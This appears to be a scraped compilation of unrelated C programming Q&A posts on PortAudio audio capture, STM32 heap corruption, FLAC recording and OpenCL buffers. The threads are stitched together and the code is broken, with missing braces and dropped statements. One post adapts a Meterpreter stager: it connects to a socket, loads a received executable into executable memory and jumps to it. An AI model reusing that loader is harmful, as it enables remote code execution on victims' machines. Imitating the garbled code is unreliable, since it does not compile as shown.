I am using PortAudio to implement real-time audio processing.
My primary task is to acquire data from the mic continuously and hand it to another processing thread in frames of 100 samples (each FRAME = 100 samples at a time).
Here is my callback, which collects 100 samples at a time on a continuous basis:
static int paStreamCallback( const void* input, void* output,
unsigned long samplesPerFrame,
const PaStreamCallbackTimeInfo* timeInfo,
PaStreamCallbackFlags statusFlags,
void* userData ) {
paTestData *data = (paTestData*) userData;
const SAMPLE *readPtr = (const SAMPLE*)input; // Casting input read to valid input type SAMPLE (float)
unsigned long totalSamples = TOTAL_NUM_OF_SAMPLES ; // totalSamples = 100 here
(void) output;
(void) timeInfo;
(void) statusFlags;
static int count = 1;
if(data->sampleIndex < count * samplesPerFrame){
data->recordedSample[data->sampleIndex] = *readPtr;
else if(data->sampleIndex == count * samplesPerFrame){
finished = paContinue;
return finished;
My main function:
int main(void){
// Some Code here
data.sampleIndex = 0;
data.frameIndex = 1;
numBytes = TOTAL_NUM_OF_SAMPLES * sizeof(SAMPLE);
data.recordedSample = (SAMPLE*)malloc(numBytes);
for(i=0; i < TOTAL_NUM_OF_SAMPLES; i++)
data.recordedSample[i] = 0;
// Open Stream Initialization
err = Pa_StartStream(stream);
/* Recording audio here..Speak into the MIC */
while((err = Pa_IsStreamActive(stream)) == 1)
if(err < 0)
goto done;
err = Pa_CloseStream(stream);
// Some more code here
Each frame of 100 samples is sent to processSampleFrame:
void processSampleFrame(SAMPLE *singleFrame){
// Free buffer of this frame
// Processing sample frame here
The challenge is that while processSampleFrame is processing one frame, my callback must stay active and keep acquiring the next frame of 100 samples (and possibly more, depending on how long processSampleFrame takes).
Also, the buffer should be able to release a frame as soon as it has been passed to processSampleFrame.
EDIT 2 :
I tried implementing with PaUtilRingBuffer that PortAudio provides. Here is my callback.
printf("Inside callback\n");
paTestData *data = (paTestData*) userData;
ring_buffer_size_t elementsWritable = PaUtil_GetRingBufferWriteAvailable(&data->ringBuffer);
ring_buffer_size_t elementsToWrite = rbs_min(elementsWritable, (ring_buffer_size_t)(samplesPerFrame * numChannels));
const SAMPLE *readPtr = (const SAMPLE*)input;
printf("Sample ReadPtr = %.8f\n", *readPtr);
(void) output; // Preventing unused variable warnings
(void) timeInfo;
(void) statusFlags;
data->frameIndex += PaUtil_WriteRingBuffer(&data->ringBuffer, readPtr, elementsToWrite);
return paContinue;
And main :
int main(void){
paTestData data; // Object of paTestData structure
data.frameIndex = 1;
data.ringBufferData = (SAMPLE*)PaUtil_AllocateMemory(numBytes);
if(PaUtil_InitializeRingBuffer(&data.ringBuffer, sizeof(SAMPLE), ELEMENTS_TO_WRITE, data.ringBufferData) < 0){
printf("Failed to initialise Ring Buffer.\n");
goto done;
err = Pa_StartStream(stream);
/* Recording audio here..Speak into the MIC */
printf("\nRecording samples\n");
while((err = Pa_IsStreamActive(stream)) == 1)
if(err < 0)
goto done;
err = Pa_CloseStream(stream);
// Error Handling here
PaTestData Structure :
typedef struct{
SAMPLE *ringBufferData;
PaUtilRingBuffer ringBuffer;
unsigned int frameIndex;
I still get the same seg-fault once the allocated space has been filled, because I cannot call free inside the callback, as the PortAudio documentation advises against it.
Where can I free the buffer of a frame that has been handed to the processing thread? Some form of thread synchronization might be really useful here. Your help is appreciated.
Example code of processing audio input:
#define FRAME_SIZE 1024
typedef struct {
int read, write;
float vol;
} paData;
static int paStreamCallback(const void* input, void* output,
unsigned long samplesPerFrame,
const PaStreamCallbackTimeInfo* timeInfo,
PaStreamCallbackFlags statusFlags,
void* userData) {
paData *data = (paData *)userData;
// Write input buffer to our buffer (memcpy is fine here; it is just a loop that copies data)
memcpy(&buffer[data->write], input, samplesPerFrame * sizeof(float)); // Assuming samplesPerFrame = FRAME_SIZE; memcpy counts bytes, not samples
// Increment write/wraparound
// dummy algorithm for processing blocks:
// Write output
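float *dummy_buffer = &buffer[data->read]; // just for easy increment
const float *in = (const float *)input; // void pointers cannot be indexed directly
float *out = (float *)output;
for (unsigned long i = 0; i < samplesPerFrame; i++) {
// Mix audio input and processed input; 50% mix
out[i] = in[i] * 0.5f + dummy_buffer[i] * 0.5f;
}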
// Increment read/wraparound
return paContinue;
int main(void) {
// Initialize code here; any memory allocation needs to be done here! default buffers to 0 (silence)
// initialize paData too; write = 0, read = 3072
// read is 3072 because I'm thinking about this like a delay system.
Take this with a grain of salt: there are obviously better ways of doing this, but it can serve as a starting point.
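The read/write index idea above can be sketched as a single-producer, single-consumer ring buffer. This is only a minimal illustration under stated assumptions: it uses C11 atomics rather than PortAudio's own PaUtilRingBuffer, and the names SampleRing, ring_init, ring_write, ring_read and RB_CAPACITY are hypothetical. The storage lives inside the struct and is reused, so nothing has to be allocated or freed in the callback.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>
#include <string.h>

#define RB_CAPACITY 1024 /* hypothetical size; must be a power of two */

typedef struct {
    float data[RB_CAPACITY];
    atomic_size_t write; /* total samples written; advanced by the producer only */
    atomic_size_t read;  /* total samples read; advanced by the consumer only */
} SampleRing;

static void ring_init(SampleRing *rb) {
    assert(rb != NULL);
    memset(rb->data, 0, sizeof rb->data);
    atomic_init(&rb->write, 0);
    atomic_init(&rb->read, 0);
}

/* Producer side (e.g. the audio callback): copies up to n samples and never
   blocks. Samples that do not fit are dropped; returns the count stored. */
static size_t ring_write(SampleRing *rb, const float *src, size_t n) {
    size_t w = atomic_load_explicit(&rb->write, memory_order_relaxed);
    size_t r = atomic_load_explicit(&rb->read, memory_order_acquire);
    size_t space = RB_CAPACITY - (w - r);
    if (n > space) n = space;
    for (size_t i = 0; i < n; i++)
        rb->data[(w + i) & (RB_CAPACITY - 1)] = src[i];
    atomic_store_explicit(&rb->write, w + n, memory_order_release);
    return n;
}

/* Consumer side (the processing thread): copies up to n samples out and
   returns how many were actually available. */
static size_t ring_read(SampleRing *rb, float *dst, size_t n) {
    size_t r = atomic_load_explicit(&rb->read, memory_order_relaxed);
    size_t w = atomic_load_explicit(&rb->write, memory_order_acquire);
    size_t avail = w - r;
    if (n > avail) n = avail;
    for (size_t i = 0; i < n; i++)
        dst[i] = rb->data[(r + i) & (RB_CAPACITY - 1)];
    atomic_store_explicit(&rb->read, r + n, memory_order_release);
    return n;
}
```

The processing thread would call ring_read in a loop and only process once it has collected a full frame; how it waits in between (sleeping, polling, a semaphore) is left open here.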
I want to retrieve an exe file from a socket and run it straight from the buffer in C. I found this little loader on GitHub, which was written to load meterpreter:
As far as I know, it works like this:
It gets the size of the exe file and allocates a buffer of that size + 5.
Then it downloads the file over a socket and stores it in the buffer.
Finally, it casts the buffer to a function pointer and simply calls the function.
That is what it does at a high level, though I don't know exactly what buffer[0] = 0xBF; actually does.
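On the 0xBF byte: in 32-bit x86 machine code, 0xBF is the opcode for "mov edi, imm32", and the four bytes that follow are its immediate operand. The 5-byte prefix therefore looks like an instruction that loads the socket handle into EDI before the downloaded code starts; that the downloaded code expects the handle there is an assumption, not something the snippet confirms. A minimal sketch that only builds the prefix in an ordinary array (build_prefix is a hypothetical name):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Builds the 5-byte prefix the loader places in front of the payload:
   one opcode byte (0xBF = "mov edi, imm32" on 32-bit x86) followed by
   the 4-byte immediate, here the socket handle value. */
static void build_prefix(unsigned char prefix[5], uint32_t socket_value) {
    assert(prefix != NULL);
    prefix[0] = 0xBF;
    memcpy(prefix + 1, &socket_value, sizeof socket_value);
}
```

This also shows why the bytes after the prefix must themselves be valid machine code at offset 5: the CPU simply keeps executing whatever follows the mov.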
I've tried to change the code to run my exe file like this (the rest of functions are exactly the same as the original code):
//receive the agent data
int recv_all(SOCKET my_socket, void* buffer, int len) {
int tret = 0;
int nret = 0;
char* startb = (char *) buffer;
while (tret < len) {
nret = recv(my_socket, (char *)startb, len - tret, 0);
if (nret == SOCKET_ERROR)
punt(my_socket, "Could not receive data");
startb += nret;
tret += nret;
return tret; // length of received Data
int main(int argc, char *argv[]){
char host[] = "localhost";
int port = 4444;
int count;
ULONG32 size = 624128; //size of my file hard coded
char *buffer;
void (* function)();
SOCKET my_socket;
my_socket = wsconnect(host, port);
buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buffer == NULL){
punt(my_socket, "could not allocate buffer");
buffer[0] = 0xBF;
memcpy(buffer + 1, &my_socket, 4);
count = recv_all(my_socket, buffer + 5, size);
function = (void (*)())buffer;
return 0;
As you can see I've just hard coded the size of my file in bytes.
Here is how I send the file:
f = open("my_file.exe", "rb")
l = f.read(1024)
l = f.read(1024)
But after running the C code I get "Access violation":
Unhandled exception at 0x0069000C in laoder.exe: 0xC0000005: Access violation writing location 0x00D20000.
I'd appreciate any help on why this happens and what I am doing wrong.
EDIT: What I thought was a bug-correction was nothing but a random fix. I was forgetting to free up heap memory correctly. See the actual code and explanation at the bottom (I'm not sure if I should have edited the whole question).
I have fixed a bug, but I do not understand what was causing it.
If I use a helper pointer to access the element of a list in the heap, and modify its contents, everything's fine. However, if I directly modify the contents of the element using a function that returns that pointer, then this data gets corrupted at a later stage when allocating more memory.
The error only appears when the code is run in a loop, on the 6th cycle.
Code does not work
// numEvents gets corrupted after some cycles
lstEvent_NewList(&lstEvent, 1, &err); // creates a list of typeEvent in heap
lstEvent_FirstNode(&lstEvent)->numEvents = events; // access first element of list directly
typeCommand * p = 0;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // THIS LINE CAUSES CORRUPTION IN numEvents
Code does work
typeEvent * pEvent; // use an auxiliar to iterate through the list
lstEvent_NewList(&lstEvent, 1, &err);
pEvent = lstEvent_FirstNode(&lstEvent);
pEvent->numEvents = events;
typeCommand * p = 0;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // all is good
So, basically, if I use an auxiliary pointer to get the first element of the list, nothing goes wrong. However, if I use the function to access the first element directly, it breaks later on in the program.
Structure and function definitions:
typeEvent * lstEvent_FirstNode (LSTEvent *lst)
return lst->ls;
void lstEvent_NewList (LSTEvent * lst, uint16_t size, uint8_t * err)
typeEvent* ret = 0;
ret = (typeEvent*)malloc(sizeof(typeEvent)*size);
if (ret == 0)
*err = E_RUN_OUT_OF_MEM;
lst->cn = 0;
*err = 0;
lst->ls = ret;
lst->cn = size;
void lstField_NewList (LSTField * lst, uint16_t size, uint8_t * err)
typeField* ret = 0;
ret = (typeField*)malloc(sizeof(typeField)*size);
if (ret == 0)
*err = E_RUN_OUT_OF_MEM;
lst->cn = 0;
*err = 0;
lst->ls = ret;
lst->cn = size;
void lstEvent_ClearList (LSTEvent * lst)
lst->ls = 0;
lst->cn = 0;
void lstField_ClearList (LSTField * lst)
lst->ls = 0;
lst->cn = 0;
struct DM_Field{
__packed uint8_t value;
typedef struct DM_Field typeField;
typedef struct LSTField {
__packed uint16_t cn; // Count, number of elements in array
uint8_t * ls; // Array
} LSTField;
struct DM_Command{
// some data
LSTField lstFields;
typedef struct DM_Command typeCommand;
Platform: STM32L1XX.
EDIT: This code more closely resembles the real thing.
Code does not work
typeCommand * p = 0;
for (uint16_t i=0; i<1000; i++)
// numEvents gets corrupted after some cycles
lstEvent_NewList(&lstEvent, 1, &err); // creates a list of typeEvent in heap
lstEvent_FirstNode(&lstEvent)->numEvents = events; // access first element of list directly
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // THIS LINE (was thought to be causing) CORRUPTION IN numEvents
p = 0;
Code does work
typeCommand * p = 0;
typeEvent * pEvent; // use an auxiliar to iterate through the list
for (uint16_t i=0; i<1000; i++)
lstEvent_NewList(&lstEvent, 1, &err);
pEvent = lstEvent_FirstNode(&lstEvent);
pEvent->numEvents = events;
p = (typeCommand *) malloc(sizeof(typeCommand)); // do some more allocations
lstField_NewList(&p->lstFields, 5, &err); // all is good
free(p); // freeing properly now
p = 0;
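Since the real cause turned out to be memory that was never freed, here is a minimal sketch of pairing every list allocation with a matching release inside the loop. The types and names (DemoEvent, DemoList, demo_new_list, demo_free_list) are hypothetical, simplified stand-ins for the real ones. Note that a "clear" function which only sets ls to 0 drops the pointer without returning the block to the heap.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct { uint16_t numEvents; } DemoEvent;           /* hypothetical element type */
typedef struct { uint16_t cn; DemoEvent *ls; } DemoList;    /* count + heap array */

/* Allocates the array; returns 0 on success, -1 if the heap is exhausted. */
static int demo_new_list(DemoList *lst, uint16_t size) {
    assert(lst != NULL);
    lst->ls = malloc(sizeof *lst->ls * size);
    lst->cn = lst->ls ? size : 0;
    return lst->ls ? 0 : -1;
}

/* Releases the array before forgetting the pointer. */
static void demo_free_list(DemoList *lst) {
    assert(lst != NULL);
    free(lst->ls); /* free(NULL) is a no-op, so this is safe on an empty list */
    lst->ls = NULL;
    lst->cn = 0;
}
```

On a small heap such as the one on an STM32, a loop that allocates without freeing will exhaust memory after a handful of cycles, which would fit a failure that only shows up on a later iteration.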
Running my program, I appear not to be writing the correct number of frames, judging by the index.
$ ./test
Now recording!! Please speak into the microphone.
index = 0
Writing to: test.flac
#include <stdint.h>
#include <string.h>
typedef struct
uint32_t duration;
uint16_t format_type;
uint16_t number_of_channels;
uint32_t sample_rate;
uint32_t frameIndex; /* Index into sample array. */
uint32_t maxFrameIndex;
char* recordedSamples;
} AudioData;
int recordFLAC(AudioData* data, const char *fileName);
AudioData* initAudioData(uint32_t sample_rate, uint16_t channels, uint32_t duration);
#include <stdio.h>
#include <stdlib.h>
#include <portaudio.h>
#include <sndfile.h>
#include "audio.h"
AudioData* initAudioData(uint32_t sample_rate, uint16_t channels, uint32_t duration)
AudioData* data = malloc(sizeof(*data));
if (!data) return NULL;
data->duration = duration;
data->format_type = 1;
data->number_of_channels = channels;
data->sample_rate = sample_rate;
data->frameIndex = 0;
data->maxFrameIndex = sample_rate * duration;
data->recordedSamples = malloc(sizeof(data->maxFrameIndex));
if(!data->maxFrameIndex) return NULL;
return data;
static int recordCallback(const void *inputBuffer, void *outputBuffer, unsigned long frameCount, const PaStreamCallbackTimeInfo* timeInfo, PaStreamCallbackFlags statusFlags, void *userData)
AudioData* data = (AudioData*)userData;
const char* buffer_ptr = (const char*)inputBuffer;
char* index_ptr = &data->recordedSamples[data->frameIndex];
(void) outputBuffer;
(void) timeInfo;
(void) statusFlags;
long framesToCalc;
long i;
int finished;
unsigned long framesLeft = data->maxFrameIndex - data->frameIndex;
if(framesLeft < frameCount){
framesToCalc = framesLeft;
finished = paComplete;
framesToCalc = frameCount;
finished = paContinue;
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0;
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = *buffer_ptr++;
data->frameIndex += framesToCalc;
return finished;
int recordFLAC(AudioData* data, const char *fileName)
PaStreamParameters inputParameters;
PaStream* stream;
int err = 0;
int totalFrames = data->maxFrameIndex;
int numSamples;
int numBytes;
char max, val;
double average;
numSamples = totalFrames * data->number_of_channels;
numBytes = numSamples;
data->recordedSamples = malloc(numBytes);
printf("Could not allocate record array.\n");
goto done;
for(int i = 0; i < numSamples; i++) data->recordedSamples[i] = 0;
if((err = Pa_Initialize())) goto done;
inputParameters.device = Pa_GetDefaultInputDevice(); /* default input device */
if (inputParameters.device == paNoDevice) {
fprintf(stderr,"Error: No default input device.\n");
goto done;
inputParameters.channelCount = data->number_of_channels; /* stereo input */
inputParameters.sampleFormat = data->format_type;
inputParameters.suggestedLatency = Pa_GetDeviceInfo(inputParameters.device)->defaultLowInputLatency;
inputParameters.hostApiSpecificStreamInfo = NULL;
/* Record some audio. -------------------------------------------- */
err = Pa_OpenStream(&stream, &inputParameters, NULL, data->sample_rate, paFramesPerBufferUnspecified, paClipOff, recordCallback, &data);
if(err) goto done;
if((err = Pa_StartStream(stream))) goto done;
puts("Now recording!! Please speak into the microphone.");
while((err = Pa_IsStreamActive(stream)) == 1)
printf("index = %d\n", data->frameIndex);
if( err < 0 ) goto done;
err = Pa_CloseStream(stream);
if(err) goto done;
/* Measure maximum peak amplitude. */
max = 0;
average = 0.0;
for(int i = 0; i < numSamples; i++)
val = data->recordedSamples[i];
val = abs(val);
if( val > max )
max = val;
average += val;
average /= (double)numSamples;
fprintf(stderr, "An error occured while using the portaudio stream\n");
fprintf(stderr, "Error number: %d\n", err);
fprintf(stderr, "Error message: %s\n", Pa_GetErrorText(err));
err = 1; /* Always return 0 or 1, but no other return codes. */
SF_INFO sfinfo;
sfinfo.channels = 1;
sfinfo.samplerate = data->sample_rate;
sfinfo.format = SF_FORMAT_FLAC | SF_FORMAT_PCM_16;
// open to file
printf("Writing to: %s\n", fileName);
SNDFILE * outfile = sf_open(fileName, SFM_WRITE, &sfinfo);
if (!outfile) return -1;
// prepare a 3 second long buffer (sine wave)
const int size = data->sample_rate * 3;
// write the entire buffer to the file
sf_write_raw(outfile, data->recordedSamples, size);
// force write to disk
// don't forget to close the file
return err;
I'm not quite sure where I am going wrong; I know I need to be writing more frames. Any suggestions?
There seems to be something wrong with your assumptions about the sample format. In the callback you are using char * (single bytes) for the sample format, but in your libsndfile call you're opening a 16 bit file with SF_FORMAT_PCM_16.
This is not so good:
data->format_type = 1;
I recommend using one of the symbolic constants in the PortAudio library for sample formatting. Maybe you want a 16 bit one? And if so, you want to be using short* not char* in the PA callback.
Finally, if your channel count is not 1, the copy loops are incorrect:
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0;
A "frame" contains data for all channels, so for example, if it's a stereo input your iteration needs to deal with both left and right channels like this:
for(i = 0; i < framesToCalc; i++){
*index_ptr++ = 0; // left
*index_ptr++ = 0; // right
Same for the other loops.
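Putting both points together, a copy loop for interleaved 16-bit samples could look roughly like the sketch below. It assumes the stream was opened with paInt16 and interleaved channels; copy_frames is a hypothetical helper, not part of PortAudio. A NULL source is treated as silence.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Copies `frames` interleaved frames of `channels` samples each.
   One frame holds one sample per channel, so the loop runs over
   frames * channels samples. A NULL source is written as silence.
   Returns the number of samples written. */
static size_t copy_frames(int16_t *dst, const int16_t *src,
                          size_t frames, size_t channels) {
    assert(dst != NULL && channels > 0);
    size_t samples = frames * channels;
    for (size_t i = 0; i < samples; i++)
        dst[i] = src ? src[i] : 0;
    return samples;
}
```

The destination buffer then needs room for frames * channels * sizeof(int16_t) bytes, and the write index should advance in samples (or be multiplied by the channel count when it is kept in frames).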
I currently have some data that I would like to pass to my GPU and then multiply by 2.
I have created a struct which can be seen here:
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float* patterns;
This struct should contain an array of floats. I will not know the size of the array until run time, as it is specified by the user.
The kernel code:
typedef struct GPUPatternDataContatiner
int nodeInput,nodeOutput,patternCount, offest;
float* patterns;
} GPUPatternData;
__kernel void patternDataAddition(__global GPUPatternData* gpd,__global GPUPatternData* output)
int index = get_global_id(0);
if(index < gpd->patternCount)
output.patterns[index] = gpd.patterns[index]*2;
Here is the Host code:
GPUPattern::GPUPatternData gpd;
gpd.nodeInput = ptSet->getInputCount();
gpd.nodeOutput = ptSet->getOutputCount();
gpd.offest = gpd.nodeInput+gpd.nodeOutput;
gpd.patternCount = ptSet->getCount();
gpd.patterns = new cl_float [gpd.patternCount*gpd.offest];
GPUPattern::GPUPatternData gridC;
gridC.nodeInput = ptSet->getInputCount();
gridC.nodeOutput = ptSet->getOutputCount();
gridC.offest = gpd.nodeInput+gpd.nodeOutput;
gridC.patternCount = ptSet->getCount();
gridC.patterns = new cl_float [gpd.patternCount*gpd.offest];
All the data is initialized with values and then passed to the GPU:
int elements = gpd.patternCount;
size_t ofsdf = sizeof(gridC);
size_t dataSize = sizeof(GPUPattern::GPUPatternData)+ (sizeof(cl_float)*elements);
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
//Copy the buffer to the device
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)&gpd,0,NULL,NULL);
//This buffer is being written to only
cl_mem bufferC = clCreateBuffer(gpu.context,CL_MEM_WRITE_ONLY,dataSize,NULL,&err);
err = clEnqueueWriteBuffer(queue,bufferC,CL_TRUE,0,dataSize,(void*)&gridC,0,NULL,NULL);
Everything builds, which I check by watching the error code, which stays at 0:
cl_program program = clCreateProgramWithSource(gpu.context,1, (const char**) &kernelSource,NULL,&err);
////Build program
err = clBuildProgram(program, 0, NULL, NULL, NULL, NULL);
char build[2048];
clGetProgramBuildInfo(program, gpu.device, CL_PROGRAM_BUILD_LOG, 2048, build, NULL);
////Create kernal
cl_kernel kernal = clCreateKernel(program, "patternDataAddition",&err);
////Set kernal arguments
err = clSetKernelArg(kernal, 0, sizeof(cl_mem), &bufferA);
err |= clSetKernelArg(kernal, 1, sizeof(cl_mem), &bufferC);
It is then kicked off
size_t globalWorkSize = 1024;
size_t localWorkSize = 512;
err = clEnqueueNDRangeKernel(queue, kernal, 1, NULL, &globalWorkSize, &localWorkSize, 0, NULL, NULL);
It's at this point that it all goes wrong:
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize, &gridC, 0, NULL, NULL);
The error in this case is -5 (CL_OUT_OF_RESOURCES).
Also, if I change the line:
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize, &gridC, 0, NULL, NULL);
to:
err = clEnqueueReadBuffer(queue, bufferC, CL_TRUE, 0, dataSize*1000, &gridC, 0, NULL, NULL);
I get the error -30 (CL_INVALID_VALUE).
So my question is: why am I getting these errors when reading back the buffer? Also, I am not sure whether I can use a pointer to my float array at all; could it be giving me the wrong sizeof() for dataSize, and therefore the wrong buffer size?
You cannot pass a struct that contains pointers into OpenCL
http://www.khronos.org/registry/cl/specs/opencl-1.2.pdf (Section 6.9)
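To see why the pointer is the problem, consider what a raw byte copy of such a struct actually transfers. The sketch below is plain C with hypothetical names (WithPointer, raw_copy) and no OpenCL calls; it only mimics what writing sizeof(struct) bytes into a buffer does.

```c
#include <assert.h>
#include <string.h>

typedef struct {
    int patternCount;
    float *patterns; /* a host address; the floats themselves live elsewhere */
} WithPointer;

/* Byte-copies the struct, the way a raw buffer write of sizeof(WithPointer)
   bytes would. Only the pointer value is copied, not the array behind it. */
static WithPointer raw_copy(const WithPointer *src) {
    assert(src != NULL);
    WithPointer dst;
    memcpy(&dst, src, sizeof dst);
    return dst;
}
```

The copy ends up pointing at the same host array as the original, and sizeof(WithPointer) is the same no matter how many floats were allocated. On the device that host address means nothing, so the kernel would dereference an invalid pointer.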
You can either fix it as Eric Bainville pointed out or, if you are not very restricted on memory, do something like
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float patterns[MAX_SIZE];
EDIT: OK if memory is an issue. Since you only use the patterns and patternCount you can copy the patterns from the struct and pass them to the kernel separately.
struct GPUPatternData
cl_int nInput,nOutput,patternCount, offest;
cl_float* patterns;
Copy the patterns from gpd to the GPU and allocate space on the GPU for the patterns in gridC.
You can pass the buffers separately:
__kernel void patternDataAddition(int gpd_patternCount,
__global const float * gpd_Patterns,
__global float * gridC_Patterns) {
int index = get_global_id(0);
if(index < gpd_patternCount)
gridC_Patterns[index] = gpd_Patterns[index]*2;
When you come back from the kernel, copy the data back to gridC.patterns directly.
One more thing:
You don't have to change your CPU struct. It stays the same. However, this part
size_t dataSize = sizeof(GPUPattern::GPUPatternData)+ (sizeof(cl_float)*elements);
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
//Copy the buffer to the device
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)&gpd,0,NULL,NULL);
should be changed to something like
size_t dataSize = (sizeof(cl_float)*elements); // HERE
float* gpd_dataPointer = gpd.patterns; // HERE
cl_mem bufferA = clCreateBuffer(gpu.context,CL_MEM_READ_ONLY,dataSize,NULL,&err);
// Now use gpd_dataPointer (the pointer itself, not its address)
err = clEnqueueWriteBuffer(queue,bufferA,CL_TRUE,0,dataSize,(void*)gpd_dataPointer,0,NULL,NULL);
The same goes for gridC.
And when you copy back, copy into gridC_dataPointer, i.e. gridC.patterns.
And then continue using the struct as if nothing happened.
The problem is probably with the pointer inside your struct.
In this case, I would suggest passing nInput, nOutput, patternCount and offset as kernel args, and the patterns as a buffer of floats:
__kernel void patternDataAddition(int nInput,int nOutput,
int patternCount,int offset,
__global const float * inPatterns,
__global float * outPatterns)
I know this is no longer current, but I solved this problem another way:
Your code for allocating memory for the struct with its data stays the same, but the struct should be changed to
typedef struct GPUPatternDataContatiner
int nodeInput, nodeOutput, patternCount, offest;
float patterns[0];
} GPUPatternData;
Using this "feature" I have created vectors for OpenCL.
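A minimal host-side sketch of that layout, assuming standard C99: the trailing array is written as patterns[] (a flexible array member), which is the standard spelling of the patterns[0] extension. FlatPatternData and flat_alloc are hypothetical names. The header and the floats sit in one contiguous block, so a single buffer of total_bytes covers both.

```c
#include <assert.h>
#include <stdlib.h>

typedef struct {
    int nodeInput, nodeOutput, patternCount, offest;
    float patterns[]; /* C99 flexible array member: storage follows the header */
} FlatPatternData;

/* Allocates header plus `count` floats in one zeroed block and reports the
   total size, which is what a buffer holding the whole thing would need.
   Returns NULL if the allocation fails. */
static FlatPatternData *flat_alloc(int count, size_t *total_bytes) {
    assert(count >= 0 && total_bytes != NULL);
    *total_bytes = sizeof(FlatPatternData) + sizeof(float) * (size_t)count;
    FlatPatternData *p = calloc(1, *total_bytes);
    if (p) p->patternCount = count;
    return p;
}
```

Whether the device compiler accepts the same struct definition is not guaranteed; treat that as something to check against your OpenCL implementation.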